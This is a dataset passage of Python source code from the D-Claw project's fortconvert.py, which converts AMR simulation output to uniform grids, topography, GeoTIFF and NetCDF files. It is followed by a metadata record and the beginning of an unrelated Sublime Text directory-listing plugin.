solutionlist[0][\"naux\"]\n fortheader[\"time\"] = solutionlist[0][\"time\"]\n fortheader[\"ndim\"] = solutionlist[0][\"ndim\"]\n fortheader[\"ngrids\"] = 1\n if components == \"all\":\n fortheader[\"meqn\"] = solutionlist[0][\"meqn\"]\n else:\n fortheader[\"meqn\"] = len(components)\n\n if isinstance(outfortt, str):\n foutt = open(outfortt, \"w\")\n else:\n foutf = outfortt\n\n if topotype is not None:\n # write t file.\n forttheaderwrite(fortheader, foutt)\n foutt.close()\n\n # prepare to return an array, OR write to topo file.\n Q = np.empty((mx * my, len(qlst)))\n if write_level:\n source_level = np.empty((my, mx))\n\n for j in range(my):\n y = ylow + (j + 0.5) * dy # here x and y are cell centers based on 0.5 dx and dy adjustement.\n for i in range(mx):\n x = xlow + (i + 0.5) * dx\n qv, lev = pointfromfort((x, y), solutionlist, bilinear=bilinear)\n qout = qv[qlst]\n Q[j * mx + i] = qout\n\n if write_level:\n source_level[j, i] = lev\n\n # if topotype is specified, write out as topotype instead of\n # array or standard fort.q\n if topotype is not None:\n\n xv = np.array(xlow + dx * np.arange(mx))\n yv = np.array(ylow + dy * np.arange(my))\n (X, Y) = np.meshgrid(xv, yv)\n Y = np.flipud(Y)\n\n if topotype == \"gtif\":\n outfile = outfortq.replace(\"fortq.\", \"fortq_\") + \".tif\"\n # this should only change the file name.\n\n # manipulate shape.order of Q\n # written row by row, so shape into my, mx, meqn\n # reorder into my, mx, meqn by shift axis so meq is at front,\n # finally flip along axis 1 so that up is up.\n\n Q_out = np.flip(\n 
np.moveaxis(Q.reshape((my, mx, len(qlst))), (0, 1, 2), (1, 2, 0)),\n axis=1,\n )\n if write_level:\n source_level = np.flipud(source_level)\n Q_out = np.concatenate(\n (np.atleast_3d(Q_out), source_level.reshape((1, my, mx))),\n axis=0,\n )\n\n gt.griddata2gtif(\n X,\n Y,\n Q_out,\n outfile,\n epsg=epsg,\n )\n\n elif topotype == \"netcdf\":\n\n outfile = outfortq.replace(\"fortq.\", \"fortq_\") + \".nc\"\n # this should only change the file name.\n\n # manipulate shape.order of Q\n # written row by row, so shape into my, mx, meqn\n # reorder into my, mx, meqn by shift axis so meq is at front,\n # finally flip along axis 1 so that up is up.\n\n Q_out = np.flip(\n np.moveaxis(Q.reshape((my, mx, len(qlst))), (0, 1, 2), (1, 2, 0)),\n axis=1,\n )\n if write_level:\n source_level = np.flipud(source_level)\n Q_out = np.concatenate(\n (np.atleast_3d(Q_out), source_level.reshape((1, my, mx))),\n axis=0,\n )\n\n gn.griddata2netcdf(\n fortheader[\"time\"],\n X,\n Y,\n Q_out,\n outfile,\n qlst,\n write_level,\n epsg=None\n )\n\n else:\n if fortheader[\"meqn\"] > 1:\n raise ValueError(\n \"refined/uniform to topo only can take 1 element, for all use gtif\"\n )\n\n outfile = outfortq\n if topotype == \"gdal\":\n gt.griddata2topofile(\n X, Y, Q, \".tmpfile\", nodata_value_out=nodata_value\n )\n infile = \".tmpfile\"\n gt.esriheader(infile, outfile)\n os.system(\"rm .tmpfile\")\n else:\n gt.griddata2topofile(\n X, Y, Q, outfile, topotype, nodata_value_out=nodata_value\n )\n else:\n return fortheader, Q\n\n else:\n if isinstance(outfortq, str):\n foutq = open(outfortq, \"w\")\n else:\n foutq = outfortq\n\n forttheaderwrite(fortheader, foutt)\n foutt.close()\n fortqheaderwrite(fortheader, foutq, closefile=False)\n\n for j in range(my):\n foutq.write(\"\\n\")\n y = ylow + (j + 0.5) * dy # here also we are extracting at cell centers.\n for i in range(mx):\n x = xlow + (i + 0.5) * dx\n qv, lev = pointfromfort((x, y), solutionlist, bilinear=bilinear)\n qout = qv[qlst]\n for q in qout:\n foutq.write(\"%s \" % float(q))\n foutq.write(\"\\n\")\n foutq.close()\n\n\n# ==============================================================================\ndef fort2refined(\n framenumber,\n outfortq,\n outfortt,\n components=\"all\",\n topotype=None,\n write_level=False,\n west=None,\n east=None,\n south=None,\n north=None,\n epsg=None,\n bilinear=True,\n):\n \"\"\"\n convert fort.qXXXX with AMR data into fort.qXXXX with data on a uniform single grid.\n Resolution is at that of the highest level grids.\n Format is still standard clawpack fort.qXXXX /fort.tXXXX and can be plotted with clawpack utilities\n Should call with outdir being a new directory to keep original fort.q/fort.t files. Names are the same\n\n future plans:\n this routine could be more efficient by directly assigning the highest level data\n for simplicity, now it just loops point by point.\n arguments\n ----------\n framenumber : of fort.qXXXX\n outfortq: name of output fort.qXXXX file\n outfortt: name of output fort.tXXXX file\n if =None routine returns a numpy array\n components: list of q components eg. 
[1,3,5] or 'all' for all components\n topotype:\n write_level: bool, to write the level from which values are taken.\n west=None,\n east=None,\n south=None,\n north=None,\n epsg=None,\n \"\"\"\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n if components == \"all\":\n qlst = np.arange(solutionlist[0][\"meqn\"])\n else:\n qlst = np.array(components, dtype=int) - 1\n\n levels = solutionlist[0][\"AMR_maxlevel\"]\n xlow = solutionlist[0][\"xlowdomain\"]\n ylow = solutionlist[0][\"ylowdomain\"]\n xhi = solutionlist[0][\"xhidomain\"]\n yhi = solutionlist[0][\"yhidomain\"]\n dx = solutionlist[0][\"dx\"]\n dy = solutionlist[0][\"dy\"]\n\n mx = int((xhi - xlow) / dx)\n my = int((yhi - ylow) / dy)\n # if any of nsew is not none crop extent.\n if east is not None or west is not None:\n xs = np.linspace(xlow, xhi, mx)\n if east is not None:\n xhi = np.max(xs[xs < east])\n if west is not None:\n xlow = np.min(xs[xs > west])\n mx = int((xhi - xlow) / dx)\n if north is not None or south is not None:\n ys = np.linspace(ylow, yhi, my)\n if north is not None:\n yhi = np.max(ys[ys < north])\n if south is not None:\n ylow = np.min(ys[ys > south])\n my = int((yhi - ylow) / dy)\n\n # fort2uniform will extract at cell centers based on the bounding rectangle defined.\n return fort2uniform(\n framenumber,\n outfortq,\n outfortt,\n xlow,\n xhi,\n ylow,\n yhi,\n mx,\n my,\n components,\n topotype,\n write_level,\n epsg,\n )\n\n\n# ==============================================================================\ndef fort2topotype(\n framenumber, outfile, fortdir, xll, yll, cellsize, ncols, nrows, m=1, topotype=2, bilinear=True,\n):\n \"\"\"\n convert data in a fort file of framenumber = XXXX, ie fort.qXXXX\n to a DEM style file of topotype=1,2 or 3, or gdal (gdal/esri header) with uniform spacing.\n m is the component of q, ie. 
the column in the fort.qXXXX file\n for all components of q, see fort2xyscattered or amr2single\n\n specifying xll, yll, cellsize, ncols, nrows will result in interpolation of AMR data\n\n without xll, yll, cellsize, ncols, nrows...the domain will be the same as input frame\n and coarse resolution.\n \"\"\"\n\n numstring = str(10000 + framenumber)\n framenostr = numstring[1:]\n forttname = os.path.join(fortdir, \"fort.t\" + framenostr)\n fortqname = os.path.join(fortdir, \"fort.q\" + framenostr)\n\n nodata_value = -9999.0\n\n solutionlist = fort2list(fortqname, forttname)\n\n if not xll:\n dx = solutionlist[0][\"dx\"]\n dy = solutionlist[0][\"dy\"]\n xll = solutionlist[0][\"xlowdomain\"]\n yll = solutionlist[0][\"ylowdomain\"]\n xhi = solutionlist[0][\"xhidomain\"]\n yhi = solutionlist[0][\"yhidomain\"]\n\n cellsize = min(dx, dy)\n ncols = int(np.floor((xhi - xll) / cellsize))\n nrows = int(np.floor((yhi - yll) / cellsize))\n\n xll = xll + 0.5 * cellsize # Here we adjust to get cell centers.\n yll = yll + 0.5 * cellsize\n xhi = xhi - 0.5 * cellsize\n yhi = yhi - 0.5 * cellsize\n\n meqn = solutionlist[0][\"meqn\"]\n\n xv = np.array(xll + cellsize * np.arange(ncols))\n yv = np.array(yll + cellsize * np.arange(nrows))\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n if m == \"topo\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[meqn - 1] - qv[0]\n\n elif m == \"depth\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n depth = qv[0]\n if depth <= 1.0e-3:\n depth = nodata_value\n Q[i, j] = depth\n\n elif m == \"eta\":\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n eta = qv[meqn - 1]\n if qv[0] <= 1.0e-3:\n eta = nodata_value\n Q[i, j] = eta\n\n elif m == \"all\":\n Q = np.zeros((ncols * nrows, meqn))\n for i in range(nrows):\n yp = Y[i, 0]\n for j in range(ncols):\n xp = X[0, j]\n k = i * ncols + j\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[k] = qv\n\n else:\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n if m == \"all\":\n headerstring = \"\"\"\n\n\n \"\"\"\n np.savetxt(outfile, Q) # ,header=headerstring) save for new numpy version\n elif topotype == \"gdal\":\n gt.griddata2topofile(X, Y, Q, \".tmpfile\", nodata_value_out=nodata_value)\n infile = \".tmpfile\"\n gt.esriheader(infile, outfile)\n os.system(\"rm .tmpfile\")\n else:\n gt.griddata2topofile(X, Y, Q, outfile, topotype, nodata_value_out=nodata_value)\n\n\n# ==============================================================================\ndef griddata2fort(\n X,\n Y,\n Q,\n qoutputfile,\n toutputfile,\n time=0.0,\n naux=0,\n ndim=2,\n grid_number=1,\n AMR_level=1,\n):\n \"\"\"\n !!!!WIP -- NOT TESTED!!!\n griddata2fort creates a clawpack fort file from grid datasets\n Q - numpy array, shape(Q)=(mx,my,meqn)\n \"\"\"\n\n Qshape = np.shape(Q)\n if len(Qshape) == 2:\n my = len(Q[:, 0])\n mx = len(Q[0, :])\n meqn = 1\n Qfort = np.reshape(Q, (mx * my, 1))\n elif len(Qshape) == 3:\n my = len(Q[:, 0, 0])\n mx = len(Q[0, :, 0])\n meqn = Qshape[2]\n Qfort = np.reshape(Q, (mx * my, 1))\n xlow = X[0, 0] # FLAG DAVE: This probably needs 
adjusting for cell center vs lower left.\n ylow = Y[-1, 0]\n dx = X[0, 1] - X[0, 0]\n dy = Y[0, 0] - Y[1, 0]\n\n array2fort(\n Qfort,\n outfortqfile,\n outforttfile,\n xlow,\n ylow,\n mx,\n my,\n dx,\n dy,\n time,\n naux,\n ndim,\n grid_number,\n AMR_level,\n )\n\n return\n\n\n# ==============================================================================\ndef array2fort(\n Q,\n fort_q_outfile,\n fort_t_outfile,\n xlow,\n ylow,\n mx,\n my,\n dx,\n dy,\n time=0.0,\n naux=0,\n ndim=2,\n grid_number=1,\n AMR_level=1,\n):\n \"\"\"\n array2fortfile creates a clawpack fort file (single grid) for a single array, Q.\n Assumed that shape(Q) = (mx*my,meqn); ie: array Q is not reshaped.\n \"\"\"\n\n meqn = np.shape(Q)[1] + 1\n\n # creat header for toutputfile\n forttheader = forttheader = {}\n forttheader[\"time\"] = time\n forttheader[\"meqn\"] = meqn\n forttheader[\"ngrids\"] = 1\n forttheader[\"naux\"] = naux\n forttheader[\"ndim\"] = ndim\n forttheaderwrite(forttheader, fort_t_outfile, closefile=True)\n\n fortqheader = {}\n fortqheader[\"xlow\"] = xlow\n fortqheader[\"ylow\"] = ylow\n fortqheader[\"dx\"] = dx\n fortqheader[\"dy\"] = dy\n fortqheader[\"mx\"] = mx\n fortqheader[\"my\"] = my\n fortqheader[\"grid_number\"] = 1\n fortqheader[\"AMR_level\"] = 1\n\n foutq = fortqheaderwrite(fortqheader, fort_q_outfile, closefile=False)\n for j in range(my):\n foutq.write(\"\\n\")\n for i in range(mx):\n rowind = j * mx + i\n qout = Q[rowind, :]\n for q in qout:\n foutq.write(\"%s \" % float(q))\n foutq.write(\"\\n\")\n foutq.close()\n\n return\n\n\n# ==============================================================================\ndef fort2griddata(fortqname, forttname, m=1, bilinear=True):\n \"\"\"\n convert data in a fort file ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. the column in the fort.qXXXX file\n \"\"\"\n\n solutionlist = fort2list(fortqname, forttname)\n fortqheader = fortqheaderread(fortqname)\n xll = fortqheader[\"xlow\"]\n yll = fortqheader[\"ylow\"]\n dx = fortqheader[\"dx\"]\n dy = fortqheader[\"dy\"]\n ncols = fortqheader[\"mx\"]\n nrows = fortqheader[\"my\"]\n\n xv = np.array(xll + dx * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + dy * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n return X, Y, Q\n\n\n# ==============================================================================\n\n# ==============================================================================\ndef fort2griddata_vector(fortqname, forttname, meqn=7, bilinear=True):\n \"\"\"\n convert data in a fort file ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. 
the column in the fort.qXXXX file\n \"\"\"\n\n solutionlist = fort2list(fortqname, forttname)\n fortqheader = fortqheaderread(fortqname)\n xll = fortqheader[\"xlow\"]\n yll = fortqheader[\"ylow\"]\n dx = fortqheader[\"dx\"]\n dy = fortqheader[\"dy\"]\n ncols = fortqheader[\"mx\"]\n nrows = fortqheader[\"my\"]\n\n xv = np.array(xll + dx * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + dy * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Xshape = np.shape(X)\n # meqn = 7\n mq = meqn + 1\n Qshape = (Xshape[0], Xshape[1], mq)\n Q = np.zeros(Qshape)\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j, :] = qv\n # import pdb;pdb.set_trace()\n\n return X, Y, Q\n\n\n# ==============================================================================\ndef fort2griddata_framenumbers(framenumber, fortdir, m=1, bilinear=True):\n \"\"\"\n convert data in a fort file of framenumber = XXXX, ie fort.qXXXX\n to numpy arrays X,Y,Q (single gridded data)\n m is the component of q, ie. the column in the fort.qXXXX file\n \"\"\"\n\n try:\n import dclaw.topotools as gt\n except:\n import geoclaw.topotools as gt\n\n if isinstance(framenumber, str):\n numstring = framenumber\n elif isinstance(framenumber, int):\n numstring = str(10000 + framenumber)\n\n framenostr = numstring[1:]\n forttname = \"fort.t\" + framenostr\n fortqname = \"fort.q\" + framenostr\n\n solutionlist = fort2list(fortqname, forttname)\n\n xv = np.array(xll + cellsize * np.arange(ncols)) # FLAG DAVE\n yv = np.array(yll + cellsize * np.arange(nrows)) # 0.5 DX, DY adjustement?\n\n (X, Y) = np.meshgrid(xv, yv)\n\n Y = np.flipud(Y)\n\n Q = np.zeros(np.shape(X))\n\n for j in range(ncols):\n xp = X[0, j]\n for i in range(nrows):\n yp = Y[i, 0]\n qv, lev = pointfromfort((xp, yp), solutionlist, bilinear=bilinear)\n Q[i, j] = qv[m - 1]\n\n return X, Y, Q\n\n\n# =========================================================================================\ndef forttheaderread(inputfile, closefile=True):\n\n \"\"\"\n read the header in inputfile (fort.tXXX) and place in dictionary forttheader to be returned.\n The header is of the following form with columns containing the forttheader value and keyword respectively.\n\n\n float time\n int meqn\n int ngrids\n int naux\n int ndim\n \"\"\"\n\n if isinstance(inputfile, str):\n fin = open(inputfile, \"r\")\n else:\n fin = inputfile\n\n forttheader = {}\n\n field = fin.readline().split()\n forttheader[\"time\"] = float(field[0])\n\n field = fin.readline().split()\n forttheader[\"meqn\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"ngrids\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"naux\"] = int(field[0])\n\n field = fin.readline().split()\n forttheader[\"ndim\"] = int(field[0])\n\n if closefile:\n fin.close()\n return forttheader\n else:\n return fin, forttheader\n\n # end fortqheader===============================================================================\n\n\n# ============================================================================\ndef forttheaderwrite(forttheader, outputfile, closefile=True):\n\n \"\"\"\n forttheaderwrite opens an ascii topography data file and writes the header\n using the dictionary \"forttheader\"\n\n The header is of the following form with columns containing value and key respectively.\n\n float time\n int meqn\n int ngrids\n int naux\n int ndim\n\n\n if closefile==True: the 
file is closed. Otherwise return the open file object.\n \"\"\"\n\n if isinstance(outputfile, str):\n fout = open(outputfile, \"w\")\n else:\n fout = outputfile\n\n fout.write(\"%s %s\\n\" % (float(forttheader[\"time\"]), \"time\"))\n fout.write(\"%s %s\\n\" % (forttheader[\"meqn\"], \"meqn\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"ngrids\"]), \"ngrids\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"naux\"]), \"naux\"))\n fout.write(\"%s %s\\n\" % (int(forttheader[\"ndim\"]), \"ndim\"))\n\n if closefile:\n fout.close()\n else:\n return fout\n # end headerwriter=========================================================================\n\n\n# =========================================================================================\ndef fortqheaderread(inputfile, closefile=True):\n\n \"\"\"\n read an individual header in inputfile (fort.qXXXX) and place in dictionary fortqheader to be returned.\n The header is of the following form with columns containing the fortqheader value and keyword respectively.\n\n int grid_number\n int AMR_level\n int mx\n int my\n float xlow\n float ylow\n float dx\n float dy\n \"\"\"\n if isinstance(inputfile, str):\n fin = open(inputfile, \"r\")\n else:\n fin = inputfile\n\n fortqheader = {}\n\n field = fin.readline().split()\n fortqheader[\"grid_number\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"AMR_level\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"mx\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"my\"] = int(field[0])\n\n field = fin.readline().split()\n fortqheader[\"xlow\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"ylow\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"dx\"] = float(field[0])\n\n field = fin.readline().split()\n fortqheader[\"dy\"] = float(field[0])\n\n if closefile:\n fin.close()\n return fortqheader\n else:\n return fin, fortqheader\n\n # end fortqheader===============================================================================\n\n\n# ============================================================================\ndef fortqheaderwrite(fortqheader, outfile, closefile=True):\n\n \"\"\"\n fortqheaderwrite writes the header in fort.qXXXX files\n using the dictionary \"fortqheader\"\n\n outputfile can be a filename or file handle\n\n The header is of the following form with columns containing value and key respectively.\n\n int grid_number\n int AMR_level\n int mx\n int my\n float xlow\n float ylow\n float dx\n float dy\n\n\n if closefile==True: the file is closed. 
Otherwise return the open file object.\n \"\"\"\n\n if isinstance(outfile, str):\n fout = open(outfile, \"w\")\n else:\n fout = outfile\n\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"grid_number\"]), \"grid_number\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"AMR_level\"]), \"AMR_level\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"mx\"]), \"mx\"))\n fout.write(\"%s %s\\n\" % (int(fortqheader[\"my\"]), \"my\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"xlow\"]), \"xlow\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"ylow\"]), \"ylow\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"dx\"]), \"dx\"))\n fout.write(\"%s %s\\n\" % (float(fortqheader[\"dy\"]), \"dy\"))\n\n if closefile:\n fout.close()\n else:\n return fout\n # end headerwriter=========================================================================\n\n\n# ================================================================================\ndef fort2list(fortqname, forttname):\n \"\"\"\n read fort.qXXXX file and make a list, solutionlist. Each element of the list is\n a dictionary representation of an individual grid (all data and relevant grid params)\n \"\"\"\n\n fortt = forttheaderread(forttname)\n fin = open(fortqname, \"r\")\n\n ngrids = fortt[\"ngrids\"]\n solutionlist = []\n\n for gridinlist in range(ngrids):\n fin, fortq = fortqheaderread(fin, closefile=False)\n griddict = {}\n griddict.update(fortt)\n griddict.update(fortq)\n griddict[\"xupper\"] = griddict[\"xlow\"] + griddict[\"mx\"] * griddict[\"dx\"]\n griddict[\"yupper\"] = griddict[\"ylow\"] + griddict[\"my\"] * griddict[\"dy\"]\n rows = griddict[\"mx\"] * griddict[\"my\"]\n grid = np.zeros((rows, griddict[\"meqn\"]))\n row = 0\n for my in range(griddict[\"my\"]):\n fin.readline()\n for mx in range(griddict[\"mx\"]):\n line1 = fin.readline().split()\n # line2 = fin.readline().split()\n grid[row, :] = np.array((line1), dtype=float)\n row = row + 1\n\n fin.readline()\n # copy might be inefficient...is a deep copy needed? 
introduced in debugging\n griddict[\"data\"] = copy.copy(grid)\n solutionlist.append(griddict)\n fin.close()\n\n xlowdomain = np.inf\n ylowdomain = np.inf\n xhidomain = -np.inf\n yhidomain = -np.inf\n maxlevel = 0\n for gridinlist in range(ngrids):\n xlowdomain = min(xlowdomain, solutionlist[gridinlist][\"xlow\"])\n ylowdomain = min(ylowdomain, solutionlist[gridinlist][\"ylow\"])\n xhidomain = max(xhidomain, solutionlist[gridinlist][\"xupper\"])\n yhidomain = max(yhidomain, solutionlist[gridinlist][\"yupper\"])\n maxlevel = max(maxlevel, solutionlist[gridinlist][\"AMR_level\"])\n for gridinlist in range(ngrids):\n solutionlist[gridinlist][\"xlowdomain\"] = xlowdomain\n solutionlist[gridinlist][\"ylowdomain\"] = ylowdomain\n solutionlist[gridinlist][\"xhidomain\"] = xhidomain\n solutionlist[gridinlist][\"yhidomain\"] = yhidomain\n solutionlist[gridinlist][\"AMR_maxlevel\"] = maxlevel\n\n orderedlist = sorted(solutionlist, key=lambda k: k[\"AMR_level\"])\n orderedlist.reverse()\n\n return orderedlist\n\n\n# ===============================================================================\ndef pointfromfort(point, solutionlist, bilinear=True):\n \"\"\"\n for a point (x,y) return the solution vector q determined from the\n best grid available for that point.\n future plans: array from fort takes numpy grid arrays X,Y\n \"\"\"\n\n xp = point[0]\n yp = point[1]\n\n griddict = solutionlist[0]\n dintersection = (\n (xp >= griddict[\"xlowdomain\"])\n & (xp <= griddict[\"xhidomain\"])\n & (yp >= griddict[\"ylowdomain\"])\n & (yp <= griddict[\"yhidomain\"])\n )\n\n if not dintersection:\n print(\"ERROR: point outside of domain:\")\n print((\"point x= %d y=%d\" % (point)))\n print(\n (\n \"domain x bounds: %d -- %d\"\n % (griddict[\"xlowdomain\"], griddict[\"xhidomain\"])\n )\n )\n print(\n (\n \"domain y bounds: %d -- %d\"\n % (griddict[\"ylowdomain\"], griddict[\"yhidomain\"])\n )\n )\n raise SystemExit(0)\n\n intersection = False\n grid = {}\n for trygrid in solutionlist:\n intersection = (\n (xp >= trygrid[\"xlow\"])\n & (xp <= trygrid[\"xupper\"])\n & (yp >= trygrid[\"ylow\"])\n & (yp <= trygrid[\"yupper\"])\n )\n if intersection:\n grid = copy.copy(trygrid)\n break\n\n try:\n xlow = grid[\"xlow\"]\n ylow = grid[\"ylow\"]\n yhi = grid[\"yupper\"]\n xhi = grid[\"xupper\"]\n dx = grid[\"dx\"]\n dy = grid[\"dy\"]\n mx = grid[\"mx\"]\n my = grid[\"my\"]\n data = grid[\"data\"]\n level = grid[\"AMR_level\"]\n except KeyError:\n\n print((\"point is possibly on amr grid edge: x= %s y=%s\" % (point)))\n print((\"intersection? %s\" % (intersection)))\n print(\"taking data from adjacent grid\")\n eps = 1e-5\n\n for trygrid in solutionlist:\n intersection = (\n (xp + eps >= trygrid[\"xlow\"])\n & (xp - eps <= trygrid[\"xupper\"])\n & (yp + eps >= trygrid[\"ylow\"])\n & (yp - eps <= trygrid[\"yupper\"])\n )\n\n if intersection:\n grid = copy.copy(trygrid)\n break\n try:\n xlow = grid[\"xlow\"]\n ylow = grid[\"ylow\"]\n yhi = grid[\"yupper\"]\n xhi = grid[\"xupper\"]\n dx = grid[\"dx\"]\n dy = grid[\"dy\"]\n mx = grid[\"mx\"]\n my = grid[\"my\"]\n data = grid[\"data\"]\n level = grid[\"AMR_level\"]\n except KeyError:\n\n print((\"point is possibly on amr grid edge: x= %s y=%s\" % (point)))\n domain = (\n griddict[\"xlowdomain\"],\n griddict[\"xhidomain\"],\n griddict[\"ylowdomain\"],\n griddict[\"yhidomain\"],\n )\n print((\"Domain xlow,xhi,ylow,yhi: [%s , %s] , [%s , %s]\" % (domain)))\n print((\"intersection? 
%s\" % (intersection)))\n print(\"quitting in protest.\")\n\n raise SystemExit(0)\n\n # actual i,j values for a given grid (note: this is not the row in data array)\n i1 = int(np.floor((xp - xlow) / dx)) + 1\n i2 = int(np.ceil((xp - xlow) / dx)) + 1\n j1 = int(np.floor((yp - ylow) / dy)) + 1\n j2 = int(np.ceil((yp - ylow) / dy)) + 1\n\n # catch small rounding errors in case point is very close to grid edge\n i1 = max(i1, 1)\n i1 = min(i1, mx)\n i2 = max(i2, 1)\n i2 = min(i2, mx)\n j1 = max(j1, 1)\n j1 = min(j1, my)\n j2 = max(j2, 1)\n j2 = min(j2, my)\n\n # x and y values of the four surrounding points in the grid\n # KRB note: I think these are the lower left corners of the cell.\n # all need increasing by 1/2 dx or dy. # does this mean that all the\n # topo writers (non-gtif) would then need adjusting... Since they all\n # assume that x and y are the lower left corners of the grid cell in\n # question.\n xl = xlow + (i1 - 1) * dx + (dx/2)\n xr = xl + dx + (dx/2)\n yl = ylow + (j1 - 1) * dy+ (dy/2)\n yu = yl + dy+ (dy/2)\n\n # indices into the data array\n ijll = (j1 - 1) * mx + i1\n ijlr = (j1 - 1) * mx + i2\n ijul = (j2 - 1) * mx + i1\n ijur = (j2 - 1) * mx + i2\n\n # solution vector at the four corners surrounding (xp,yp)\n qll = data[ijll - 1, :]\n qlr = data[ijlr - 1, :]\n qul = data[ijul - 1, :]\n qur = data[ijur - 1, :]\n\n # bilinear interpolation to (xp,yp)\n if bilinear:\n q = (\n qll * (xr - xp) * (yu - yp)\n + qlr * (xp - xl) * (yu - yp)\n + qul * (xr - xp) * (yp - yl)\n + qur * (xp - xl) * (yp - yl)\n )\n q = q / (dx * dy)\n else:\n # don't interpolate, instead, take the native grid resolution\n # value. Choose whichever of ll, lr, ul, lr is closest based on\n # the relative areas is bigger. https://en.wikipedia.org/wiki/Bilinear_interpolation\n\n all = (xr - xp) * (yu - yp)\n alr = (xp - xl) * (yu - yp)\n aul = (xr - xp) * (yp - yl)\n aur = (xp - xl) * (yp - yl)\n\n maxa = max((all, alr, aur, aul))\n\n if all == maxa:\n q = qll\n elif alr == maxa:\n q = qlr\n elif aul == maxa:\n q = qul\n else:\n q = qur\n\n return q, level\n\n\n# ===============================================================================\ndef intersection(rectangle1, rectangle2):\n \"\"\"\n return True of False if rectangle1 and rectangle2 intersect\n Note: rectangles may be single points as well, with xupper=xlower etc.\n arguments:\n rectangleX: list [xlower,ylower,xupper,yupper]\n\n\n \"\"\"\n xl1 = rectangle1[0]\n yl1 = rectangle1[1]\n xu1 = rectangle1[2]\n yu1 = rectangle1[3]\n\n xl2 = rectangle2[0]\n yl2 = rectangle2[1]\n xu2 = rectangle2[2]\n yu2 = rectangle2[3]\n\n nonintersection = (xl1 > xu2) | (xl2 > xu1) | (yl1 > yu2) | (yl2 > yu1)\n intersection = not nonintersection\n\n return intersection\n","repo_name":"geoflows/D-Claw","sub_path":"python/dclaw/fortconvert.py","file_name":"fortconvert.py","file_ext":"py","file_size_in_byte":46700,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"16449045608","text":"import os\nimport re\nimport sublime\nimport sublime_plugin\n\nVERSION = int(sublime.version())\nIS_ST3 = VERSION >= 3006\nCUR_ITER_ORDER = 1\n\ndef _ignore_file(filename, ignore_patterns=None):\n ignore_patterns = ignore_patterns or []\n ignore = False\n directory, base = os.path.split(filename)\n for pattern in ignore_patterns:\n if re.match(pattern, base):\n return True\n\n if len(directory) > 0:\n ignore = _ignore_file(directory, ignore_patterns)\n\n return ignore\n\ndef _list_path_file(path, ignore_patterns=None):\n 
ignore_patterns = ignore_patterns or []\n file_list = []\n if not os.path.exists(path):\n sMsg = \"{0} is not exist or can't visited!\".format(path)\n sublime.error_message(sMsg)\n raise ValueError(sMsg)\n\n for file in os.listdir(path):\n if not _ignore_file(file, ignore_patterns):\n file_list.append(file)\n\n return sorted(file_list)\n\nclass TraverseCurrentDirCommand(sublime_plugin.TextCommand):\n def __init__(self, args):\n sublime_plugin.TextCommand.__init__(self, args)\n self.quick_panel_files = None\n self.settings = None\n self.curName = None\n self.ignore_patterns = None\n self.path = None\n self.path_objs = None\n self.quick_panel_files = None\n\n def run(self, edit):\n self.settings = sublime.load_settings(\"ListCurrentDir.sublime-settings\")\n current = os.path.abspath(self.view.file_name())\n self.curName = os.path.basename(current)\n\n self.ignore_patterns = self.settings.get(\"ignore_patterns\", [r'.*?\\.tags'])\n self.show_dir_file(os.path.dirname(current))\n\n @classmethod\n def get_parent_path(cls, path):\n path = path.strip('/')\n parentPath = os.path.dirname(path)\n return parentPath\n\n def show_dir_file(self, path):\n self.path = path\n\n if self.quick_panel_files is not None and self.curName in self.quick_panel_files:\n index = self.quick_panel_files.index(self.curName) + CUR_ITER_ORDER\n else:\n index = -1\n\n self.build_quick_panel_file_list()\n\n if index >= len(self.quick_panel_files) or index <= 1:\n if CUR_ITER_ORDER == 1:\n index = 2\n else:\n index = len(self.quick_panel_files) - 1\n\n 